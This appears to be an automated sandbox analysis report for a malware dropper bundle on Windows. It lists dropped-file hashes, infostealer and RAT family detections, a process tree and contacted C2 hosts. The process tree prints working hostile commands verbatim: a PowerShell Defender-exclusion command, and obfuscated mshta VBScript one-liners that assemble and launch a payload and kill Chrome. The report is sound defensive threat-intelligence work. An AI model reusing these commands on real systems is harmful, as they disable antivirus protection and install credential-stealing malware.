C:\Users\Admin\AppData\Local\Temp\ykifDQA.1
| MD5 | 7b25b2318e896fa8f9a99f635c146c9b |
| SHA1 | 10f39c3edb37b848974da0f9c1a5baa7d7f28ee2 |
| SHA256 | 723b3b726b9a7394ac3334df124a2033536b108a8eb87ec69e0a6e022c7dcd89 |
| SHA512 | a3b294e93e9d0a199af21ad50af8290c0e0aaa7487019480ca3ffd75aa8ad51c4d33612ec69275e4fa2273ca5e33fdfdf263bb0ce81ad43ce092147118fa8ca6 |
C:\Users\Admin\AppData\Local\Temp\7TcIneJp.0
| MD5 | 6c83f0423cd52d999b9ad47b78ba0c6a |
| SHA1 | 1f32cbf5fdaca123d32012cbc8cb4165e1474a04 |
| SHA256 | 4d61a69e27c9a8982607ace09f0f507625f79050bdf7143c7fe0701bf1fab8ae |
| SHA512 | e3d1537f4b22ceadfef3b30216b63320b397a179ab9d5f1eb66f93811a2717ee1fb6222989f610acd4c33fae6078c3df510022b5748a4f1d88ebf08c12f9deec |
C:\Users\Admin\AppData\Local\Temp\gUVIl5.SCh
| MD5 | 973c9cf42285ae79a7a0766a1e70def4 |
| SHA1 | 4ab15952cbc69555102f42e290ae87d1d778c418 |
| SHA256 | 7163bfaaaa7adb44e4c272a5480fbd81871412d0dd3ed07a92e0829e68ec2968 |
| SHA512 | 1a062774d3d86c0455f0018f373f9128597b676dead81b1799d2c2f4f2741d32b403027849761251f8389d248466bcd66836e0952675adcd109cc0e950eaec85 |
memory/1436-212-0x0000000007CD0000-0x0000000007CDE000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\R6f7sE.I
| MD5 | bd3523387b577979a0d86ff911f97f8b |
| SHA1 | 1f90298142a27ec55118317ee63609664bcecb45 |
| SHA256 | a7e608f98f06260044d545f7279b8f859f7b7af98ac2b2b79a3cd7ac3b2dac36 |
| SHA512 | b37cb8daddb526312f6be439a3cb87fe62b69d44866df708f10eb148455f09f90b0dcee4360c1ae332d3936357fd4c474920aebec5aa8ddb005b617356c3d286 |
memory/1436-215-0x0000000007CE0000-0x0000000007CF4000-memory.dmp
memory/1436-216-0x0000000007DD0000-0x0000000007DEA000-memory.dmp
memory/1436-217-0x0000000007DC0000-0x0000000007DC8000-memory.dmp
memory/1392-232-0x0000000003490000-0x0000000003535000-memory.dmp
memory/1392-233-0x0000000003540000-0x00000000035D2000-memory.dmp
memory/1392-236-0x0000000003540000-0x00000000035D2000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
| MD5 | 56972d2427d8040e1a9d3d9975c3d80b |
| SHA1 | d8da15bf72e4365d231dc522fe40e415d501935d |
| SHA256 | 1da9c188d08195682e0e9efc7b09c3892071f873c9d64d03aba707da4ee8223a |
| SHA512 | 1a14322a6b769f12bd52eb5918657d46b0269137a5c8ee4b8d4854c75e5b5e9a9f0507a7c284a18e2866864b84d92113d1b8ef04d1503ec43afd17c81e0a9a1a |
\??\pipe\crashpad_3544_NKUYEGKDGTDPBDSX
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
memory/4692-244-0x0000000000400000-0x00000000016E0000-memory.dmp
memory/2720-243-0x0000000000400000-0x00000000016E0000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports
| MD5 | d751713988987e9331980363e24189ce |
| SHA1 | 97d170e1550eee4afc0af065b78cda302a97674c |
| SHA256 | 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945 |
| SHA512 | b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af |
memory/1392-257-0x0000000000400000-0x000000000054C000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | 8707857582ee711842093cc40ebd451a |
| SHA1 | 4dcde0e81eba17d6658cf993d6fd56f8a461db58 |
| SHA256 | c8eef49293912eb1d6f1e607a7ccc49c291aad2eb70debc61f5570f717d03841 |
| SHA512 | 366fedb6259252cf63012abe14683b0d38aa21242fb0ba93dc4f56ca70ab7541d50ad10d833c3fc372301d425a9f45320bae88d139e89f143918c1bf0411eff0 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | cf6a778de8e1362f6569d955637654ee |
| SHA1 | 3308d816553910d89028bda45c3d6ae436e1d601 |
| SHA256 | ff69f842152f9d8a0e2be272bdb68ddbeba74bc146bcbe93100b66ce00981daf |
| SHA512 | 87c962fdb3ba84548b83df7a45038977557b5e1ba1ee349886f19843fb3d7ce8a9259412fada8d01876ed005330b394c1e7d1ac39761a982d6abb8f7e0697090 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
| MD5 | 376a191911245eeb64e68761bc781d8f |
| SHA1 | f6a1c84db673648d3fee255f538c0c31b4e71eaa |
| SHA256 | 9c39e02600ec945cc5be9fee2e81fefeeb0f229b2e66735e9d2f884c7f84ea70 |
| SHA512 | 81d5b101f779ac20b6af1f3f41534a5c972522c3368426ef882af7729d48b4ebea477626c595c6bf5f1d07c4a4a8346f48a2c0cf6bfb4064d96c7e0a78de626a |
memory/2720-284-0x0000000000400000-0x00000000016E0000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 314c53681aabc2acdbff99425c085e21 |
| SHA1 | fa2a86c55810b0887f6df1db9f60bfa28a5ca4b6 |
| SHA256 | 8c6bbed2b771d5a8b95e9a1be9d2a91b53384648aec0626f0482e61dd49092af |
| SHA512 | 96b568dacf26b80d47aaa3d1c25e0054a1c8df5d25da42e499dc4c0e30475ccd7f981dc285f8b126f34016458a7dc7fa0e746b2a0e35aa67b767d9a2642d8673 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState
| MD5 | d2bee316deb3c50f0a55de5bd4532a69 |
| SHA1 | 59bec04677e70e03f2851d1747a85ffa5d661c19 |
| SHA256 | 246d19db38389048a1bb75f013a6fc6260fec2762b0d032eb2d5294181de56f0 |
| SHA512 | 09578a4860b76c410d710b5a2e05974bda1e4bb30d98bf3668b0c518af20eb3db34b48becf89f9f91d7bc21042931ec983c47c0f1591e35a8d4644e2298f7179 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | b3b910ecd5692cdc58554830013b2a1b |
| SHA1 | c8049a5e442e43b4d001488df7d0fde67af5cf1f |
| SHA256 | 0f9451ad2b7de0421e0643efb90545916912d3717f8f85fcec70fa989ada3cbe |
| SHA512 | 51ba3972896e99a81ce5405de9c0e5e3e03337a33d5eec517d7ba3147dc4a4de1396e8951f512893c3e1138504f379ded799626e71bce5d32d42bc7b125f0e58 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | baa661f3f81fdc358d76a8a889c560ad |
| SHA1 | c76bd94b5358c1054cf20e10812d9ad4e50144b3 |
| SHA256 | 3e2a800cce3d09107ebdde5a00c20633b5bdb536e21d7a97b62b291c6f52d7f0 |
| SHA512 | 1318a7fe58a25248707130ab898e96f429cc8aee6a4a2a127f074d77c6d99eef792e8a8e97359ea0475d5d8b5dbd229934deb063c45443bfe923afa17de222c5 |
memory/1392-320-0x0000000003540000-0x00000000035D2000-memory.dmp
memory/1392-321-0x00000000035E0000-0x0000000004321000-memory.dmp
memory/1392-322-0x0000000004330000-0x00000000043BB000-memory.dmp
memory/1392-323-0x00000000043C0000-0x0000000004447000-memory.dmp
memory/2912-329-0x00000000030A0000-0x0000000003145000-memory.dmp
memory/2912-330-0x0000000003160000-0x00000000031F2000-memory.dmp
memory/2912-333-0x0000000003160000-0x00000000031F2000-memory.dmp
memory/2912-335-0x0000000000400000-0x000000000054C000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | e75b9cc9c8d5d45bd5f3d9302864d086 |
| SHA1 | 602100a673f3a7760be56e5d6bda67308d7cd515 |
| SHA256 | 3870a860139cef756417825a524ca8c104c717cd9eafbfb38d76cab95905cd42 |
| SHA512 | b5ad624c3835d8f8da979f7c332ea7762234dce4178048d0f8b972d619f10f86132226e07ab215953505c9758e7c752e1375587b483b6e5335c0360b33d62314 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | fa8afef9682ae8195ad927bade96ff48 |
| SHA1 | 154c6646d60801888984e0347976e1f9bb57fdae |
| SHA256 | afadfc9bced3fc7c52f14afc31ef1900eb450c56d5961961577ecafc83b2e0cc |
| SHA512 | c390f276b58f8a7928133ce2b822005a3603b514d81bd9e4fd5c23f99924271cecf09403093b572a74435493eab8abc6d429385e67621df1b22aada71a143cb8 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
| MD5 | d7abae24e2a4580fc7cbdbfc4da6da09 |
| SHA1 | a5ca1678925ba335076f2650bd2cd359a4c7449f |
| SHA256 | e566ec34a7e1647a5e8844dc694471ab144418a728b6acdf37ec0b410263d9c5 |
| SHA512 | e8edf54c27cfedd1a6b774fd567fa23fe467639e8bfad42f2fe3623021e9d6ec12de741be1d7f7056176d8240fbf7524e94665035edc4c5de854366f9519f0f3 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 4f18a5c02b3c498230fd9f67703ce3ea |
| SHA1 | f49e60b461773ad4c15690bc2515b568bbbf1102 |
| SHA256 | c7bc63889e130268efb14445b8fadd00411fb3cbb3e1332923350bc4146b1dc1 |
| SHA512 | a3076567d2e74841c3426706f38f016f09c6cd8fec2e6737eea38d44722d169556d755420d08f5118666a6d1b8aea648c9d6cf0c492cc5e9af101d2b01920afb |
C:\Users\Admin\AppData\Local\Temp\e598c77.exe
| MD5 | a014b8961283f1e07d7f31ecdd7db62f |
| SHA1 | 70714b6dc8abbaa5d1cba38c047ea3a4ec6ac065 |
| SHA256 | 21ce0cdfaeb6d7f58bd17545be18f9cd3ac2476939112872d1a05d3164098f89 |
| SHA512 | bd0bb1405c7d74c941c5db0d3fd5fbe93544055f79db5076ab293c868568873df98f902c343096ff765be6c4911435617aab2ada15591dfc90606b5630d64869 |
memory/704-429-0x0000000000880000-0x0000000000888000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 2ce12a6ff86fb598af4475d5edd76519 |
| SHA1 | c5473a4e031d48bca261f6031669872f597c62e6 |
| SHA256 | 1c8928519fe544eefd6a02e7a295607a9aceb0f1bf169e724c765dd3031b5678 |
| SHA512 | 9486687e7dd0db7c5bbdbb5db12c9b915661d8937b063299431a7f1d72fadc8bf765d73c8668d5fffa1cb0d903a5ae3802e0d56c7beeab9f9440a653dfee7213 |
Analysis: behavioral3
Detonation Overview
Submitted
2024-11-22 09:57
Reported
2024-11-22 09:59
Platform
win7-20240903-en
Max time kernel
149s
Max time network
151s
Command Line
Signatures
Detect Fabookie payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Fabookie
Fabookie family
GCleaner
Gcleaner family
NullMixer
Nullmixer family
OnlyLogger
Onlylogger family
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Redline family
SectopRAT
SectopRAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Sectoprat family
Socelars
Socelars family
Socelars payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
OnlyLogger payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
ASPack v2.12-2.42
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
Loads dropped DLL
Reads user/profile data of web browsers
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Looks up geolocation information via web service
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2124 set thread context of 2704 | N/A | C:\Users\Admin\AppData\Local\Temp\7zS49891AC6\Sun0794d0eebce1.exe | C:\Users\Admin\AppData\Local\Temp\7zS49891AC6\Sun0794d0eebce1.exe |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\7zS49891AC6\Sun0741b6b6c3.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\7zS49891AC6\setup_install.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS49891AC6\Sun07778dd9fc6d53.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS49891AC6\setup_install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS49891AC6\Sun0741b6b6c3.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS49891AC6\Sun07cad998fb20a18.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\control.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS49891AC6\Sun0752b359bd184a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS49891AC6\Sun07e3a022a8656c5ca.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS49891AC6\Sun0794d0eebce1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS49891AC6\Sun075246a0bffeab.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS49891AC6\Sun07be2debb1a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\09xU.exE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\setup_installer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS49891AC6\Sun0794d0eebce1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS49891AC6\Sun0752b359bd184a.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
C:\Users\Admin\AppData\Local\Temp\7zS49891AC6\setup_install.exe
"C:\Users\Admin\AppData\Local\Temp\7zS49891AC6\setup_install.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun0741b6b6c3.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun0752b359bd184a.exe /mixone
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun07be2debb1a.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun07e3a022a8656c5ca.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun075246a0bffeab.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun07778dd9fc6d53.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun07fcb30681127.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun07dc9d2dae027.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun0750d1e499.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun0794d0eebce1.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun07cad998fb20a18.exe
C:\Users\Admin\AppData\Local\Temp\7zS49891AC6\Sun0741b6b6c3.exe
Sun0741b6b6c3.exe
C:\Users\Admin\AppData\Local\Temp\7zS49891AC6\Sun07be2debb1a.exe
Sun07be2debb1a.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Users\Admin\AppData\Local\Temp\7zS49891AC6\Sun075246a0bffeab.exe
Sun075246a0bffeab.exe
C:\Users\Admin\AppData\Local\Temp\7zS49891AC6\Sun0752b359bd184a.exe
Sun0752b359bd184a.exe /mixone
C:\Users\Admin\AppData\Local\Temp\7zS49891AC6\Sun07fcb30681127.exe
Sun07fcb30681127.exe
C:\Users\Admin\AppData\Local\Temp\7zS49891AC6\Sun07cad998fb20a18.exe
Sun07cad998fb20a18.exe
C:\Users\Admin\AppData\Local\Temp\7zS49891AC6\Sun0750d1e499.exe
Sun0750d1e499.exe
C:\Users\Admin\AppData\Local\Temp\7zS49891AC6\Sun07e3a022a8656c5ca.exe
Sun07e3a022a8656c5ca.exe
C:\Users\Admin\AppData\Local\Temp\7zS49891AC6\Sun0794d0eebce1.exe
Sun0794d0eebce1.exe
C:\Users\Admin\AppData\Local\Temp\7zS49891AC6\Sun07778dd9fc6d53.exe
Sun07778dd9fc6d53.exe
C:\Users\Admin\AppData\Local\Temp\7zS49891AC6\Sun07dc9d2dae027.exe
Sun07dc9d2dae027.exe
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ("CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\7zS49891AC6\Sun07cad998fb20a18.exe"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If """" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\7zS49891AC6\Sun07cad998fb20a18.exe"") do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 236 -s 272
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\7zS49891AC6\Sun07cad998fb20a18.exe" 09xU.exE &&STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "" =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\7zS49891AC6\Sun07cad998fb20a18.exe") do taskkill /F -Im "%~NxU"
C:\Users\Admin\AppData\Local\Temp\09xU.exE
09xU.EXE -pPtzyIkqLZoCarb5ew
C:\Windows\SysWOW64\taskkill.exe
taskkill /F -Im "Sun07cad998fb20a18.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2584 -s 448
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ("CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If ""-pPtzyIkqLZoCarb5ew "" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"") do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\09xU.exE" 09xU.exE &&STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "-pPtzyIkqLZoCarb5ew " =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\09xU.exE") do taskkill /F -Im "%~NxU"
C:\Users\Admin\AppData\Local\Temp\7zS49891AC6\Sun0794d0eebce1.exe
C:\Users\Admin\AppData\Local\Temp\7zS49891AC6\Sun0794d0eebce1.exe
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbScRipT: cloSE ( creAteobjECT ( "WscriPT.SHell" ). RuN ( "cMd.exE /Q /r eCHO | SET /P = ""MZ"" > ScMeAP.SU & CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I & StART control .\R6f7sE.I " ,0,TRuE) )
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /Q /r eCHO | SET /P = "MZ" > ScMeAP.SU &CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH +7TCInEJp.0 + yKIfDQA.1 r6f7sE.I& StART control .\R6f7sE.I
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" eCHO "
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>ScMeAP.SU"
C:\Windows\SysWOW64\control.exe
control .\R6f7sE.I
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\R6f7sE.I
C:\Windows\system32\RunDll32.exe
C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\R6f7sE.I
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\R6f7sE.I
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | hsiens.xyz | udp |
| NL | 45.133.1.182:80 | tcp | |
| N/A | 127.0.0.1:49289 | tcp | |
| N/A | 127.0.0.1:49291 | tcp | |
| US | 8.8.8.8:53 | www.listincode.com | udp |
| US | 8.8.8.8:53 | iplogger.org | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 142.250.200.3:80 | c.pki.goog | tcp |
| FI | 135.181.129.119:4805 | tcp | |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 8.8.8.8:53 | topniemannpickshop.cc | udp |
| US | 162.159.133.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | niemannbest.me | udp |
| LV | 45.142.215.47:27643 | tcp | |
| US | 8.8.8.8:53 | www.iyiqian.com | udp |
| SG | 13.251.16.150:80 | www.iyiqian.com | tcp |
| US | 8.8.8.8:53 | ggg-cl.biz | udp |
| US | 8.8.8.8:53 | all-mobile-pa1ments.com.mx | udp |
| US | 8.8.8.8:53 | buy-fantasy-football.com.sg | udp |
| FI | 135.181.129.119:4805 | tcp | |
| LV | 45.142.215.47:27643 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| LV | 45.142.215.47:27643 | tcp | |
| NL | 45.133.1.107:80 | tcp | |
| LV | 45.142.215.47:27643 | tcp | |
| NL | 45.9.20.13:80 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
